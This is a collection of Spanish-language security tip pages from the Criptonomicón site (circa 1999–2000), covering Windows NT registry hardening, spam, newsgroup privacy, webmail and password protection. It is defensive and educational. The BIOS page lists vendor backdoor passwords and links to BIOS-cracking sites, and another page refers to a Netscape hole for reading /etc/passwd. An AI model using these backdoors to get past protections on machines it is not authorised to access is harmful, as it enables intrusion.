cambio al protocolo https, en la ventana de direccin. Para saber con cuntos bits de
clave est utilizando Internet Explorer, no tienes ms que pasar el ratn por encima,
sin necesidad de pinchar en l. Si haces doble clic, aparecer una ventana con
informacin sobre el certificado del sitio web seguro. En el campo "Tipo de
encriptacin" se dan los detalles de algoritmos y longitud de claves.

Participa con tus consejos y trucos


Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/ssl.html (2 of 3) [25/10/2000 02:31:31 p.m.]

Estamos seguros con SSL?

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/ssl.html (3 of 3) [25/10/2000 02:31:31 p.m.]

Configuracin segura del Registro en Windows NT

Consejos para
administradores
Consejos para
usuarios

Configuracin segura del Registro en


Windows NT
En esta ocasin, contamos con los valiosos consejos de Bernardo Quintero, para
aumentar la seguridad de nuestro sistema configurando adecuadamente el registro de
Windows NT.
El Registro de NT es un arma muy poderosa, por lo normal olvidada, para poder
configurar correctamente nuestra mquina. En HispaSec vamos a dar algunos
ejemplos de cmo unas sencillas modificaciones permiten aumentar la seguridad de
nuestros sistemas.
Una poltica de seguridad que englobe el factor humano, una actualizacin constante
de los parches, un seguimiento diario de las noticias sobre los nuevos riesgos, y una
buena configuracin de los sistemas, son pilares bsicos a la hora de proveer un
entorno seguro.
Cuando hablamos de configuracin del sistema en Windows NT, debemos de tener
una especial atencin, entre otras, a la administracin de las cuentas de usuarios, la
seguridad de los recursos, los permisos de los archivos y directorios, los logs para
auditorias, o las relaciones de confianzas. Sin duda podremos acudir a la extensa
bibliografa existente para encontrar cumplida informacin sobre stas y otras
caractersticas del sistema de Microsoft.
Sin embargo, suele ser habitual olvidar, o dejar en un segundo plano, los valores del
Registro, herramienta fundamental a la hora de poder configurar determinados
controles de seguridad. Debemos de pensar en el Registro de NT con una base de
datos donde tienen cabida los parmetros de configuracin de nuestro sistema,
similar en parte a lo que se recoga en los ficheros .ini de otras versiones de
Windows. NT permite interactuar con estos valores a travs de las distintas
herramientas de configuracin del sistema. No obstante, quedan aun mltiples
parmetros a los que slo se podr llegar a travs del acceso directo mediante el
editor de Registro: regedt32.exe.
Es obligacin por nuestra parte recomendar un especial cuidado a la hora de trabajar
directamente con el editor de Registro, ya que una introduccin de valores errneos
puede acarrear diversos problemas al sistema. El entorno ideal para estos casos sera
contar con una mquina de pruebas, y tras comprobar que no existen problemas,
proceder a la modificacin del Registro en el resto de sistemas.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/registront1.html (1 of 3) [25/10/2000 02:31:32 p.m.]

Configuracin segura del Registro en Windows NT

Veamos a continuacin algunos parmetros modificables, a travs de la aplicacin


regedt32.exe, que pueden ayudarnos para poder crear un entorno ms seguro en
Windows NT.
Ruta: HKLM\SOFTWARE\Microsoft\WindowsNT\Current\Version\Winlogon
Variable: DontDisplayLastUserName
Valor: 1
Esta modificacin, DontDisplayLastUserName=1, evitar que el sistema muestre en
la ventana de autentificacin el nombre del ltimo usuario. De sobra es conocido que
los nombres de usuarios son pieza codiciada por los crackers, a la hora de poder
proceder a distintos tipos de ataque, como el de fuerza bruta. Es por ello que adems
de esta modificacin, recomendamos renombrar las cuentas de usuarios que vienen
por defecto en Windows NT, como pueda ser la del Administrador.
Ruta: HKLM\SYSTEM\CurrentControlSet\Control\SessionManager\MemoryManagement
Variable: ClearPageFileAtShutdown
Valor: 1
Con este valor conseguiremos que el archivo que almacena la memoria virtual del
sistema se borre automticamente tras salir de una sesin. Esta caracterstica evitar
que un posible atacante accediera a este archivo y recogiera informacin
confidencial.
Ruta: HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon
Variable: AllocateFloppies
Valor: 1
Ruta: HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon
Variable: AllocateCDROMS
Valor: 1
Con ests dos entradas se consigue desactivar las disqueteras y las unidades de
CD-ROM respectivamente. En determinados entornos se aconseja esta prctica, para
impedir la grabacin de datos, o la ejecucin e instalacin de software. Sin olvidar
que tambin suelen ser entrada habitual de los virus informticos.
Estos son slo algunos ejemplos de la potencia que puede suministrar el uso directo
del Editor de Registro. En sucesivas entregas seguiremos comentando otras entradas
y configuraciones que nos ayudarn a conseguir un entorno NT ms seguro. As
mismo, extenderemos estas recomendaciones a otros sistemas mayoritarios, como
puede ser Linux.
Participa con tus consejos y trucos
file:///C|/TEMP/criptonomicon/criptonomicon/consejos/registront1.html (2 of 3) [25/10/2000 02:31:32 p.m.]

Configuracin segura del Registro en Windows NT

Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/registront1.html (3 of 3) [25/10/2000 02:31:32 p.m.]

Configuracin segura del Registro en Windows NT

Consejos para
administradores
Consejos para
usuarios

Configuracin segura del Registro en


Windows NT (II)
Segunda entrega sobre la configuracin del registro para dotar de mayor seguridad al
los sistemas NT, escrita por Bernardo Quintero, de HispaSec. En esta ocasin
podremos conocer, entre otros puntos, como desactivar el inicio de sesin
automtico, impedir el apagar el sistema a los usuarios, auditar los accesos remotos o
incluir un aviso al iniciar la sesin.
Como ya indicbamos en la primera parte, una-al-da del 19/6/1999 (tambin
publicada en el boletn #53 del Criptonomicn), el Registro de NT es un arma muy
poderosa para poder configurar correctamente determinados parmetros de nuestra
mquina. Ya comentamos que NT permite modificar estas variables a travs de las
herramientas de administracin que posee el sistema, si embargo, quedaban
importantes parmetros a los que slo podemos llegar mediante el editor de Registro:
regedt32.exe.
Al igual que entonces, le recordamos que han de tener un especial cuidado a la hora
de trabajar directamente con el editor de Registro, ya que una introduccin de valores
errneos puede acarrear problemas al sistema. Volvemos a insistir en que el entorno
ideal para estos casos sera contar con una mquina de pruebas, y tras comprobar que
no existen problemas, proceder a la modificacin del Registro en el resto de sistemas.
A continuacin, y sin ms prembulos, indicamos los valores del registro que deben
modificar junto con una breve explicacin de los resultados que se obtienen:
- -Ruta: HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon
Variable: AutoAdminLogon Valor: 0
Esta modificacin, AutoAdminLogon=0, evitar saltarse el cuadro de dilogo de
autentificacin a travs de los valores DefaultUsername, DefaultPassword y
DefaultDomain. Esta caracterstica es posible si se ha configurado el
AutoAdminLogon para evitar el tener que teclear la password cada vez que se inicie
la sesin. Esta prctica, a todas luces poco recomendable, podremos evitarla
asegurndonos que la variable del Registro contiene el valor 0.
- -Ruta: HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon
Variable: ShutdownWithoutLogon Valor: 0

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/registront2.html (1 of 2) [25/10/2000 02:31:32 p.m.]

Configuracin segura del Registro en Windows NT

Con este valor conseguiremos que no se pueda apagar un sistema NT sin iniciar una
sesin. Esta posibilidad presenta un problema de seguridad que se agrava en el caso
de los servidores cuya ubicacin fsica no est protegida. Si esta caracterstica
estuviera habilitada cualquiera podra apagar el sistema desde el cuadro de dilogo de
autentificacin, con la consecuente perdida de servicios y recursos para los clientes
que estuvieran haciendo uso de l.
- -Ruta: HKLM\SYSTEM\CurrentControlSet\Services\RemoteAccess Variable:
Parameters Valor: 1
- -Ruta: HKLM\SYSTEM\CurrentControlSet\Control\LSA
Variable: FullPrivilegeAuditing Valor: 1
En el primer caso estaremos habilitando la auditora de los servicios de acceso
remoto. Con la segunda variable conseguiremos auditar todos los derechos de
usuarios, que nos ayudar para poder controlar si algn usuario utiliza ciertos
derechos administrativos para llegar a ficheros confidenciales o que entraen riesgos
al sistema.
- -Ruta: HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon
Variables: LegalNoticeCaption LegalNoticeText
Con ests dos entradas podremos habilitar una aviso que se dispare a modo de
ventana cada vez que se inicie la sesin. Esta prctica se recomienda en entornos
corporativos, y puede contener avisos legales, consejos, o normas internas, que
pueden prevenir de un mal uso de la red y reprimir intentos de sabotajes.
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/registront2.html (2 of 2) [25/10/2000 02:31:32 p.m.]

Configuracin segura del Registro en Windows NT

Consejos para
administradores
Consejos para
usuarios

Configuracin segura del Registro en


Windows NT (III)
En esta tercera entrega sobre la configuracin del registro en los sistemas NT, escrita
por Bernardo Quintero, de HispaSec, vamos a conocer como podemos evitar ciertos
riesgos que pueden darse a travs de las redes. Deshabilitar las unidades compartidas
por defecto, impedir el uso de credenciales nulas que pueden facilitar informacin
sensible, o como elegir el sistema de cifrado para que las passwords viajen seguras.
NT por defecto comparte cada uno de los discos duros o particiones que tengamos en
nuestro sistema. Para evitar este hecho deberemos crear una nueva variable tipo
DWORD, a travs del editor del registro, en la trayectoria:
HKLM\System\CurrentControlSet\Services\LanmanServer\Parameters Variable:
AutoShareServer Valor: 0
Esta ser la entrada correcta en el caso de que estemos en un NT Server, para las
versiones Workstation deberemos cambiar la variable por AutoShareWks.
Iniciar una sesin nula, o login annimo, permite obtener informacin sensible como
pueden ser los nombres de usuario, grupos, recursos compartidos, propiedades de las
passwords, etc. Por defecto NT permite las credenciales nulas contra
\\nombreservidor\IPC$, y es utilizado por aplicaciones, como es el caso de
asexplorer.exe, para enumerar los recursos compartidos en servidores remotos.
Esta misma va podra ser utilizada con malas intenciones, por ejemplo a travs del
comando NET USE, para recopilar informacin de cara a un posterior ataque. Se
puede forzar la autenticacin en este tipo de sesiones mediante la activacin de la
variable RestricAnonymous.
HKLM\System\CurrentControlSet\Control\LSA Variable: RestricAnonymous Valor:
1
Los sistemas NT permiten dos tipos de desafos para lograr la autenticacin ante el
servidor. El ms seguro es el propietario de NT (MD4), y tenemos en el desafo
LanManager (DES), para clientes Windows 95/98 y NetWare, el eslabn ms dbil.
NT trabaja por defecto con ambos sistemas simultneamente, por lo que un atacante
que interceptara los paquetes durante el desafo podra llegar a conseguir las
contraseas.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/registront3.html (1 of 2) [25/10/2000 02:31:32 p.m.]

Configuracin segura del Registro en Windows NT

Para evitar dar facilidades en este sentido se pueden configurar nuestros sistemas
para que nicamente utilicen el sistema de autenticacin LanManager cuando se
necesite. Para ello deberemos igualar la variable LMCompatibilityLevel a 1.
HKLM\System\CurrentControlSet\Control\LSA Variable: LMCompatibilityLevel
Valor: 1
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/registront3.html (2 of 2) [25/10/2000 02:31:32 p.m.]

Publicar en las news sin dar tus verdaderos datos

Consejos para
administradores
Consejos para
usuarios

Publicar en las news sin dar tus


verdaderos datos
Cuando publicas un mensajes en los foros de noticias, el programa de correo que
uses, toma por defecto y manda, lgicamente sin decirte absolutamente nada, tu
direccin de correo y otra serie de datos, que se pueden ver, incluso aunque no firmes
"manualmente" el mensaje, si entras en propiedades del mensaje.
Este acto tan inocente de dejar tu direccin verdadera de correo a la vista de
cualquier lector puede llegar a suponerte una serie de problemas, que yo en carne
propia he padecido por algo tan nimio como publicar unos mensajes un da en que
estaba convocada huelga (mensajes desagradables, mail-bombing, spam, etc.).
Y claro, el que te mande algo, no va a ser tan incauto como t y mandarlo desde su
verdadera direccin de correo. Ya te puedes preparar a recibir publicidad no deseada
desde sitios de los que ni has odo hablar, hasta aburrirte.
La solucin, puede ser tan compleja como buscar redireccionadores, programas
externos que modifiquen las propiedades de tu mensaje o jugar un poco con el
Outlook Express; para ello, y sin de paso falsear los datos verdaderos que utilices en
tus mensajes de correo "personales", selecciona desde Outlook la direccin desde la
cual te conectas a los foros, por ejemplo foros.teleline.es, vete a HERRAMIENTAS CUENTAS - NOTICIAS - PROPIEDADES y en la pestaa GENERAL vers los
campos NOMBRE y DIRECCION ELECTRONICA que manda el programa
acompaando a tus mensajes.
Desde ah, modifcalos y pon lo que quieras, con la garanta de que no van a salir los
datos de tu cuenta de correo real cuando escribas en las news, pero s cuando mandes
mensajes personales, excepto que tambin hayas seguido el mismo procedimiento
para modificar los datos de la bandeja de salida, que tambin tiene sus ventajas en
algunas ocasiones.
Los mensajes, se pueden rastrear, pero solamente a partir de la direccin IP que
tenas asignada al enviar ese boletn y, claro est, con la colaboracin de tu
proveedor, que ya es ms difcil.
Y claro, si crees que con aadir una firma del tipo pepeNOSPAM@hotmail.com,
incluida en el mensaje lo solucionas, avisarte de que eso no vale para nada.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/news.html (1 of 2) [25/10/2000 02:31:32 p.m.]

Publicar en las news sin dar tus verdaderos datos

Ten en cuenta, claro, que quien te quiera responder a tu boletn, solamente tiene la
opcin de hacerlo publicando otro en el mismo foro que t, pero no puede
responderte "personalmente" a una direccin... que no existe.
Puedes aprender ms sobre spam.
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/news.html (2 of 2) [25/10/2000 02:31:32 p.m.]

Di NO al spam

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Di NO al spam
ltimamente, el spam se ha convertido en una de las peores plagas que asolan
Internet. La mayor parte del correo basura est constituido por anuncios comerciales,
normalmente de productos dudosos, pornografa, mtodos fantasiosos para hacerse
rico o servicios en la frontera de la legalidad. Estrictamente hablando, no existe
forma humana (ni mecnica) de evitarlo por completo. Sin embargo, s que se pueden
apuntar una serie de sugerencias, que si bien no nos impermeabilizarn al correo
basura, al menos lo harn disminuir significativamente.

Control de acceso

CGI

Java

JavaScript

Cookies

Si acabas de recibir un correo basura, puedes bloquear la direccin del remitente, de


manera que se eliminen automticamente los correos que en el futuro te lleguen de
esa direccin, haciendo lo siguiente en Outlook Express: abre el mensaje y pincha
con el botn derecho del ratn sobre la direccin del spammer. En el men
desplegable que se presenta, selecciona "Bloquear remitente".
Ahora bien, esta precaucin no te proteger de nuevos spammers. Para ello, puedes
crear filtros de entrada para enviar a la papelera aquellos mensajes con frases
sospechosas en su asunto que contengan las palabras "dinero", "millonario" o "sex" o
una proliferacin de signos de exclamacin, en el ms puro estilo cutre del correo
basura.

Crashes

Netscape Messenger
Agujeros

Spam

Remailers

En Edicin-->Filtros de mensajes-->Nuevo, puedes definir reglas adecuadas para que


los correos se eliminen automticamente segn llegan sin molestarte, ahorrndote ese
trabajo. Indica que se eliminen los mensajes con asunto que contenga las palabras
sospechosas. Pulsando el botn "Ms" puedes definir ms reglas para cada palabra de
la que desconfes.
Outlook Express

Anonimato

Correo seguro

Web seguro

Puedes eliminar automticamente los mensajes entrantes, configurando las reglas


pertinentes en Herramientas-->Reglas de mensaje-->Correo-->Nueva. Marca "La
lnea Asunto contiene las palabras especificadas" y en la nueva ventana pulsa
repetidamente el botn "Agregar" para aadir tantas palabras sospechosas como se te
ocurran. Finalmente, define la accin "Eliminarlo".
Participa con tus consejos y trucos

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/spam.html (1 of 2) [25/10/2000 02:31:33 p.m.]

Di NO al spam
Consejos prcticos

Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Referencias

Libro de Visitas
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/spam.html (2 of 2) [25/10/2000 02:31:33 p.m.]

Copia Carbn Oculta

Consejos para
administradores
Consejos para
usuarios

Copia Carbn Oculta


Todos sabemos lo molesto que puede llegar a ser el spam y deberamos
tomar algunas precauciones para prevenirlo (puede obtener ms informacin
sobre spam si lo desea). A veces incluso colaboramos sin querer, cuando
enviamos correos a muchos destinatarios, puestas sus direcciones una
detrs de otra bien en el campo Para:, o bien utilizando el campo CC: (Copia
de Carbn, por aquello de las pginas de papel carbn que se ponan
antiguamente para hacer copias de cartas redactadas a mquina, que los
lectores menos jvenes seguro que an recuerdan). La consecuencia de
utilizar este mtodo para enviar un mensaje a mltiples destinatarios es que
todos ven las direcciones de los otros, lo cual puede no resultar deseable en
muchas ocasiones.
Para evitarlo existe el campo CCO (Copia de Carbn Oculta), en el que
pondremos a todos los destinatarios del mensaje, de manera que cuando
ste llegue a sus destinos, no sabrn a quines les fueron enviados y no
dispondrn por tanto de estas direcciones.
Veamos cmo hacerlo con dos de los programas de correo ms populares:
Outlook Express
Para utilizar el cuadro CCO, haga clic en el men "Ver" y seleccione "Todos
los encabezados".
Netscape Messenger
Haga clic en "A:" para seleccionar un tipo de destinatario diferente del
normal. A continuacin seleccione CCO e introuduzca todos los destinatarios
ocultos separados por punto y coma (;).
(Mi agradecimiento a Fernando Weber por sugerirme el tema).
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/copiacarbon.html (1 of 2) [25/10/2000 02:31:33 p.m.]

Copia Carbn Oculta


Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/copiacarbon.html (2 of 2) [25/10/2000 02:31:33 p.m.]

Correo Web seguro

Consejos para
administradores
Consejos para
usuarios

Correo Web seguro


El correo Web, por su conveniencia, facilidad de uso y precio (es gratis!), se
est convirtiendo en una herramienta cada da ms utilizada. Pero qu
riesgos entraa? Hotmail ha compilado las siguientes sugerencias para
ayudarle a ser un usuario de correo electrnico seguro y con sentido comn:
Modifique su contrasea con frecuencia. El cambio de contrasea
puede asegurar que su correo electrnico siga siendo privado.
Adems, las contraseas que utilizan letras y nmeros son ms
difciles de adivinar.
No comparta su contrasea. La mayora de los administradores de
correo electrnico no le pedir su contrasea. No se deje engaar por
mensajes de correo electrnico maliciosos que le pidan su contrasea.
ste es un truco bien conocido, aunque no demasiado comn, ideado
para engaarle y hacer que comparta su contrasea. Como regla
general, no la comparta nunca con nadie.
Nunca abra archivos de datos adjuntos que provengan de un origen
desconocido. Pueden contener lo que se conoce como "cartas bomba"
o "virus", los cuales pueden daar su PC.
Recuerde siempre cerrar la sesin cuando haya terminado. Es rpido,
fcil y puede impedir que intrusos no deseados tengan acceso a su
cuenta. Si utiliza un equipo pblico, en un caf de Internet por ejemplo,
le aconsejamos que cierre el explorador que estaba utilizando cuando
est preparado para finalizar su sesin de Internet.
No responda a mensajes no solicitados ("spam"), u otro tipo de correo
ofensivo o de acoso. Al responder, lo que nico que hace es confirmar
que tiene una direccin de correo electrnico activa a la que pueden
enviar constantemente correo electrnico no solicitado. En su lugar,
dirija el mensaje no solicitado al departamento del servicio al cliente del
correo electrnico de origen (normalmente algo similar a
abuse@[dominiocorrespondiente].com). Para ayudar a controlar el
envo masivo, Hotmail proporciona a sus usuarios "filtros" para el
correo entrante. stos se pueden configurar fcilmente para enviar
ciertos mensajes (como los que incluyan ciertas palabras)
directamente a su papelera de reciclaje.
Asegrese de que utiliza el software de Internet ms reciente (p.e., un

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/correoweb.html (1 of 2) [25/10/2000 02:31:33 p.m.]

Correo Web seguro

explorador como Microsoft Internet Explorer o Netscape Navigator).


Las versiones ms recientes a menudo ofrecen mejoras para proteger
la seguridad.
Utilice siempre una red segura. La mayor parte de redes corporativas y
proveedores de servicios Internet estn protegidos por administradores
que vigilan los posibles problemas de seguridad y actan para proteger
a los usuarios de los "intrusos" (usuarios malintencionados) que
pueden intentar robar informacin personal que se transfiera a travs
de la red. Aunque el riesgo es pequeo, tenga precaucin cuando
utilice una red que no le sea familiar. Use estaciones mantenidas por
personal de confianza, o bien pregunte si el equipo de Internet que
utiliza est protegido contra infracciones de seguridad.
Utilice el sentido comn cuando est conectado a Internet y mantenga
cierta dosis de escepticismo. Tenga precaucin cuando revele
informacin personal, tal como su direccin fsica, a cualquiera que
conozca en el ciberespacio; incluso si afirma ser una autoridad.

Fuente: www.hotmail.es
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/correoweb.html (2 of 2) [25/10/2000 02:31:33 p.m.]

Cmo configurar las contraseas

Consejos para
administradores
Consejos para
usuarios

Cmo configurar las contraseas

Passwords fuertes en NT

Passwords de la BIOS

Passwords en la sombra

Participa con tus consejos y trucos


Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/passwords.html [25/10/2000 02:31:34 p.m.]

Passwords fuertes en NT

Consejos para
administradores
Consejos para
usuarios

Passwords fuertes en NT
Pregunta: Cul es el eslabn ms dbil de la cadena de seguridad en sistemas
informticos?
Respuesta: El usuario final.
Dale a un usuario la oportunidad de elegir libremente su password e inventar
palabras de paso como juan98 (se llama Juan, claro) o leire93 (su mujer y el ao de
su boda). Con esa clase de passwords, las medidas de seguridad ms extremas a
menudo no sirven de nada.
Windows NT 4.0 Service Pack 2 incluye una nueva DLL (Passfilt.dll) que permite
obligar que los usuarios introduzcan passwords fuertes, al incorporar la siguiente
poltica:
1. Los passwords deben tener una longitud mnima de 6 caracteres.
2. Los passwords deben contener caracteres de al menos tres de las siguientes cuatro
clases: a) Letras maysculas b) Letras minsculas c) Nmeros d) Caracteres
especiales no alfanumricos, como signos de puntuacin
3. Los passwords no podrn contener el nombre de usuario ni otra parte del nombre
completo del usuario.
Para ms informacin e instrucciones de instalacin se puede consultar la pgina de
Microsoft.
(Nota: para consultar esa pgina antes hay que registrarse en el servicio de soporte de
Microsoft, gratuitamente)
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/nt.html (1 of 2) [25/10/2000 02:31:34 p.m.]

Passwords fuertes en NT
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/nt.html (2 of 2) [25/10/2000 02:31:34 p.m.]

Passwords en la BIOS

Consejos para
administradores
Consejos para
usuarios

Passwords en la BIOS
Normalmente, los ordenadores incorporan la capacidad de proteger mediante
password el acceso a los datos de configuracin de la BIOS. Esta utilidad resulta de
extremado inters en entornos multiusuario como un laboratorio o el centro de
clculo de una universidad, donde pululan cientos de estudiantes, muchos de ellos
malvolos, que por motivos difciles de explicar sienten la necesidad de cambiar la
configuracin de la BIOS, a menudo con consecuencias desastrosas para el
ordenador... y para el encargado de la sala.
Sin embargo, no todo el monte es organo. Los fabricantes de BIOS suelen utilizar
puertas traseras, que aunque tericamente slo deberan conocer ellos, terminan
saliendo a la luz, como AWARD BIOS, que se puede romper con AWARD_SW,
AWARD_PW o j262. AMIBIOS y Phoenix tambin poseen los suyos.
Ms fcil puede ser resetear la memoria de la BIOS quitando la pila de la placa base
y volvindola a conectar. A veces basta con cambiar un simple jumper.
Adems, existen multitud de programas para saltarse estas barreras, que se pueden
encontrar en las siguientes localizaciones:
http://www.hedgie.com/passwords/bios.html
http://hem.passagen.se/unaxor/cracking.html
http://www.voicenet.com/~raze/files/textfaq/pchack.txt
http://www.geocities.com/Area51/Zone/6430/cracking.html
Por lo tanto, no hay que confiar en los passwords de la BIOS para proteger el sistema
y se debe preparar un sistema de proteccin ms seguro. Eso, claro est, queda a la
discrecin del administrador.
(Elaborado a partir del mensaje de Paul L Schmehl(pauls@UTDALLAS.EDU) a la
lista de NTBuqTraq)
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/bios.html (1 of 2) [25/10/2000 02:31:34 p.m.]

Passwords en la BIOS
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/bios.html (2 of 2) [25/10/2000 02:31:34 p.m.]

Passwords en la sombra

Consejos para
administradores
Consejos para
usuarios

Passwords en la sombra
Qu puede ocurrir si el archivo ms famoso de Unix, el celebrrimo /etc/passwd,
cae en manos de un atacante? No tiene ms que ejecutar su programa revientaclaves
favorito y sentarse a esperar hasta que empiecen a aparecer nombres de usuario con
sus respectivas contraseas. Con suerte, si el administrador es ingenuo o dejado,
incluso dar con la clave del root, abrindosele as las puertas a la mquina objetivo.
S, pero es muy difcil que se hagan con el fichero /etc/passwd, lo tengo bien
protegido, se dirn algunos administradores. Eso crees? No tienes ms que visitar
mi pgina sobre agujeros en Netscape, donde encontrars una demostracin de un
agujero en Netscape Communicator 4.5 que permite leer el fichero en cuestin. Haz
la prueba!
Afortunadamente, este problema tiene fcil solucin. Utiliza las contraseas en la
sombra, en otras palabras, un segundo fichero que contiene las contraseas cifradas y
slo accesible por root, mientras que el /etc/passwd ya no contiene ms que un * en
el lugar donde deberan aparecer las contraseas cifradas.
Puedes descargar el paquete de Shadow Passwords desde cualquiera de los siguientes
sitios, con instrucciones para su instalacin:
ftp://i17linuxb.ists.pwr.wroc.pl/pub/linux/shadow/shadow-current.tar.gz
ftp://ftp.icm.edu.pl/pub/Linux/shadow/shadow-current.tar.gz
ftp://iguana.hut.fi/pub/linux/shadow/shadow-current.tar.gz
ftp://ftp.cin.net/usr/ggallag/shadow/shadow-current.tar.gz
ftp://ftp.netural.com/pub/linux/shadow/shadow-current.tar.gz
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
